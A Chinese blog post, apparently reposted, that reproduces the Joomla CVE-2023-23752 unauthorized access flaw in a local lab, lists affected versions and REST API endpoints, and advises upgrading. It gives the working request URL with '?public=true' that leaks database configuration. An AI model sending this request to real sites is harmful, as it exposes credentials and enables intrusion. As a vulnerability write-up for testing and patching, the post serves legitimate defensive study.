Joomla未授权访问漏洞CVE-2023-23752

1、前言

Joomla是一套全球知名的内容管理系统（CMS），其使用PHP语言加上MySQL数据库所开发，可以在Linux、Windows、MacOSX等各种不同的平台上运行。

2月16日，Joomla官方发布安全公告，修复了Joomla! CMS中的一个未授权访问漏洞（CVE-2023-23752），目前该漏洞的细节及PoC/EXP已公开。

Joomla! CMS 版本4.0.0- 4.2.7中由于对web 服务端点访问限制不当，可能导致未授权访问Rest API，造成敏感信息泄露（如数据库账号密码等）。

2、受影响版本

受影响版本

4.0.0 <= Joomla <= 4.2.7

不受影响版本Joomla >= 4.2.8

Joomla 3及以下版本均不受该漏洞影响

3、搭建环境

使用phpstudy搭建

解压后复制到phpstudy/WWW/Joomla/目录下。

4、访问目标http://127.0.0.1/Joomla

5、设置登陆数据

6、数据库配置

7、安装成功

8、访问后台成功

9、漏洞复现

http://127.0.0.1/Joomla/api/index.php/v1/config/application?public=true

可获取数据库配置信息

10、获取网站配置信息

11、其他受影响API如下

v1/banners

v1/banners/:id

v1/banners

v1/banners/:id

v1/banners/clients

v1/banners/clients/:id

v1/banners/clients

v1/banners/clients/:id

v1/banners/categories

v1/banners/categories/:id

v1/banners/categories

v1/banners/categories/:id

v1/banners/:id/contenthistory

v1/banners/:id/contenthistory/keep

v1/banners/:id/contenthistory

v1/config/application

v1/config/:component_name

v1/contacts/form/:id

v1/contacts

v1/contacts/:id

v1/contacts

v1/contacts/:id

v1/contacts/categories

v1/contacts/categories/:id

v1/contacts/categories

v1/contacts/categories/:id

v1/fields/contacts/contact

v1/fields/contacts/contact/:id

v1/fields/contacts/contact

v1/fields/contacts/contact/:id

v1/fields/contacts/mail

v1/fields/contacts/mail/:id

v1/fields/contacts/mail

v1/fields/contacts/mail/:id

v1/fields/contacts/categories

v1/fields/contacts/categories/:id

v1/fields/contacts/categories

v1/fields/contacts/categories/:id

v1/fields/groups/contacts/contact

v1/fields/groups/contacts/contact/:id

v1/fields/groups/contacts/contact

v1/fields/groups/contacts/contact/:id

v1/fields/groups/contacts/mail

v1/fields/groups/contacts/mail/:id

v1/fields/groups/contacts/mail

v1/fields/groups/contacts/mail/:id

v1/fields/groups/contacts/categories

v1/fields/groups/contacts/categories/:id

v1/fields/groups/contacts/categories

v1/fields/groups/contacts/categories/:id

v1/contacts/:id/contenthistory

v1/contacts/:id/contenthistory/keep

v1/contacts/:id/contenthistory

v1/content/articles

v1/content/articles/:id

v1/content/articles

v1/content/articles/:id

v1/content/categories

v1/content/categories/:id

v1/content/categories

v1/content/categories/:id

v1/fields/content/articles

v1/fields/content/articles/:id

v1/fields/content/articles

v1/fields/content/articles/:id

v1/fields/content/categories

v1/fields/content/categories/:id

v1/fields/content/categories

v1/fields/content/categories/:id

v1/fields/groups/content/articles

v1/fields/groups/content/articles/:id

v1/fields/groups/content/articles

v1/fields/groups/content/articles/:id

v1/fields/groups/content/categories

v1/fields/groups/content/categories/:id

v1/fields/groups/content/categories

v1/fields/groups/content/categories/:id

v1/content/articles/:id/contenthistory

v1/content/articles/:id/contenthistory/keep

v1/content/articles/:id/contenthistory

v1/extensions

v1/languages/content

v1/languages/content/:id

v1/languages/content

v1/languages/content/:id

v1/languages/overrides/search

v1/languages/overrides/search/cache/refresh

v1/languages/overrides/site/zh-CN

v1/languages/overrides/site/zh-CN/:id

v1/languages/overrides/site/zh-CN

v1/languages/overrides/site/zh-CN/:id

v1/languages/overrides/administrator/zh-CN

v1/languages/overrides/administrator/zh-CN/:id

v1/languages/overrides/administrator/zh-CN

v1/languages/overrides/administrator/zh-CN/:id

v1/languages/overrides/site/en-GB

v1/languages/overrides/site/en-GB/:id

v1/languages/overrides/site/en-GB

v1/languages/overrides/site/en-GB/:id

v1/languages/overrides/administrator/en-GB

v1/languages/overrides/administrator/en-GB/:id

v1/languages/overrides/administrator/en-GB

v1/languages/overrides/administrator/en-GB/:id

v1/languages

v1/media/adapters

v1/media/adapters/:id

v1/media/files

v1/media/files/:path/

v1/media/files/:path

v1/media/files

v1/media/files/:path

v1/menus/site

v1/menus/site/:id

v1/menus/site

v1/menus/site/:id

v1/menus/administrator

v1/menus/administrator/:id

v1/menus/administrator

v1/menus/administrator/:id

v1/menus/site/items

v1/menus/site/items/:id

v1/menus/site/items

v1/menus/site/items/:id

v1/menus/administrator/items

v1/menus/administrator/items/:id

v1/menus/administrator/items

v1/menus/administrator/items/:id

v1/menus/site/items/types

v1/menus/administrator/items/types

v1/messages

v1/messages/:id

v1/messages

v1/messages/:id

v1/modules/types/site

v1/modules/types/administrator

v1/modules/site

v1/modules/site/:id

v1/modules/site

v1/modules/site/:id

v1/modules/administrator

v1/modules/administrator/:id

v1/modules/administrator

v1/modules/administrator/:id

v1/newsfeeds/feeds

v1/newsfeeds/feeds/:id

v1/newsfeeds/feeds

v1/newsfeeds/feeds/:id

v1/newsfeeds/categories

v1/newsfeeds/categories/:id

v1/newsfeeds/categories

v1/newsfeeds/categories/:id

v1/plugins

v1/plugins/:id

v1/privacy/requests

v1/privacy/requests/:id

v1/privacy/requests/export/:id

v1/privacy/requests

v1/privacy/consents

v1/privacy/consents/:id

v1/redirects

v1/redirects/:id

v1/redirects

v1/redirects/:id

v1/tags

v1/tags/:id

v1/tags

v1/tags/:id

v1/templates/styles/site

v1/templates/styles/site/:id

v1/templates/styles/site

v1/templates/styles/site/:id

v1/templates/styles/administrator

v1/templates/styles/administrator/:id

v1/templates/styles/administrator

v1/templates/styles/administrator/:id

v1/users

v1/users/:id

v1/users

v1/users/:id

v1/fields/users

v1/fields/users/:id

v1/fields/users

v1/fields/users/:id

v1/fields/groups/users

v1/fields/groups/users/:id

v1/fields/groups/users

v1/fields/groups/users/:id

v1/users/groups

v1/users/groups/:id

v1/users/groups

v1/users/groups/:id

v1/users/levels

v1/users/levels/:id

v1/users/levels

v1/users/levels/:id

12、修复建议

官方已发布安全版本修复此漏洞，建议受影响的用户及时升级防护：

https://downloads.joomla.org/

标签：网络安全

本文转载自: https://blog.csdn.net/dahege666/article/details/129728789
版权归原作者 我是哥哥。 所有，如有侵权，请联系我们删除。

Joomla未授权访问漏洞CVE-2023-23752

发表评论

“Joomla未授权访问漏洞CVE-2023-23752”的评论:

关于作者

overfit同步小助手

相关阅读

文章导航